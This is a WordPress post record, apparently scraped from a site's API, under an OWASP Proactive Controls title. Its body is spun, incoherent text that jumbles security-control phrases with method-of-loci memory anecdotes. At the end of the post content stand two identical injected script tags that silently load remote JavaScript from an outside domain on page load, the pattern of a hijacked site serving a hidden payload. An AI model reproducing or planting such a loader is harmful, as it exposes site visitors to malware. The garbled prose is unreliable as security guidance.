{"id":1541,"date":"2023-04-21T12:12:01","date_gmt":"2023-04-21T12:12:01","guid":{"rendered":"https:\/\/www.mejakerja.net\/documentation\/?p=1541"},"modified":"2025-10-21T10:22:45","modified_gmt":"2025-10-21T10:22:45","slug":"proactive-controls-owasp-foundation","status":"publish","type":"post","link":"https:\/\/www.mejakerja.net\/documentation\/?p=1541","title":{"rendered":"Proactive Controls OWASP Foundation"},"content":{"rendered":"<p>Hundreds of changes were accepted from this open community process. The OWASP Top Ten Proactive Controls describes the most important controls and control categories that every architect and developer should absolutely, 100% include in every project. Let\u2019s explore each of the OWASP Top Ten, discussing how the pieces of the Proactive Controls  mitigate the defined application security risk.<\/p>\n<div style='text-align:center'><iframe width='561' height='311' src='https:\/\/www.youtube.com\/embed\/9nKn-8cKJFw' frameborder='0' alt='OWASP Proactive Controls Lessons' allowfullscreen><\/iframe><\/div>\n<p>The first step in  using the method of loci is to translate information into memorable images. First, you use your imagination to come up with mental imagery and sensations that would remind you of the information in some way. One of the main goals of this document is to provide concrete practical guidance that helps developers build secure software. These techniques should be applied proactively at the early stages of software development to ensure maximum effectiveness.<\/p>\n<h2>Proactive Controls Index\u00b6<\/h2>\n<p>As application developers, we are used to logging data that helps us debug and trace issues concerning wrong business flows or exceptions thrown. Security-focused logging is another type of data logs that we should strive to maintain in order to create an audit trail that later helps track down security breaches and other security issues. While the current OWASP Proactive Controls do not match up perfectly with the OWASP Top Ten for 2021, they do a fair job of advising on controls to add to your applications to mitigate the dangers the Top Ten describes. Logging is storing a protected audit trail that allows an operator to reconstruct the actions of any subject or object that performs an action or has an action performed against it.<\/p>\n<ul>\n<li>The method of loci takes a well-known area and identifies locations in that space to imprint information for later retrieval.<\/li>\n<li>Security-focused logging is another type of data logs that we should strive to maintain in order to create an audit trail that later helps track down security breaches and other security issues.<\/li>\n<li>The Proactive Controls project is an OWASP Lab documentation project and<br \/>\nthe PDF can be downloaded for various languages.<\/li>\n<li>The input is interpreted as a command, processed, and performs an action at the attacker\u2019s control.<\/li>\n<li>I could tell you that software is one of the most significant attack vectors.<\/li>\n<\/ul>\n<p>Insufficient entropy is when crypto algorithms do not have enough randomness as input into the algorithm, resulting in an encrypted output that could be weaker than intended. Continuing down my journey locations, here are examples <a href=\"https:\/\/remotemode.net\/become-a-net-razor-developer\/owasp-proactive-controls\/\">OWASP Proactive Controls Lessons<\/a> of how you can REV-up the imagery of placing images. Making the image ridiculous is the pi\u00e8ce de r\u00e9sistance for making something memorable. Weirdness breaks the mold of expectation and impresses an image on your memory.<\/p>\n<h2>OWASP Proactive Controls 2018<\/h2>\n<p>Imagine the choir singer busting through the door because she was escaping the security guards. They were trying to stop her from cheating on her diet because they are the \u201cdiet police.\u201d Diet police? It does when you remember that she had defined abdominals which means she must be on a strict diet, right? The point is that this is a story that puts meaning to the placement of the image on the location. Logically it doesn\u2019t make sense, but you\u2019re going to remember it because that\u2019s a memorable reason. Smash the choir singer through the door with a loud bang, busting open the door, seeing splinters flying everywhere.<\/p>\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hundreds of changes were accepted from this open community process. The OWASP Top Ten Proactive Controls describes the most important controls and control categories that every architect and developer should absolutely, 100% include in every project. Let\u2019s explore each of the OWASP Top Ten, discussing how the pieces of the Proactive Controls mitigate the defined &#8230; <a title=\"Proactive Controls OWASP Foundation\" class=\"read-more\" href=\"https:\/\/www.mejakerja.net\/documentation\/?p=1541\" aria-label=\"More on Proactive Controls OWASP Foundation\">Read more<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[69],"tags":[],"_links":{"self":[{"href":"https:\/\/www.mejakerja.net\/documentation\/index.php?rest_route=\/wp\/v2\/posts\/1541"}],"collection":[{"href":"https:\/\/www.mejakerja.net\/documentation\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mejakerja.net\/documentation\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mejakerja.net\/documentation\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mejakerja.net\/documentation\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1541"}],"version-history":[{"count":3,"href":"https:\/\/www.mejakerja.net\/documentation\/index.php?rest_route=\/wp\/v2\/posts\/1541\/revisions"}],"predecessor-version":[{"id":5368,"href":"https:\/\/www.mejakerja.net\/documentation\/index.php?rest_route=\/wp\/v2\/posts\/1541\/revisions\/5368"}],"wp:attachment":[{"href":"https:\/\/www.mejakerja.net\/documentation\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1541"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mejakerja.net\/documentation\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1541"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mejakerja.net\/documentation\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1541"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}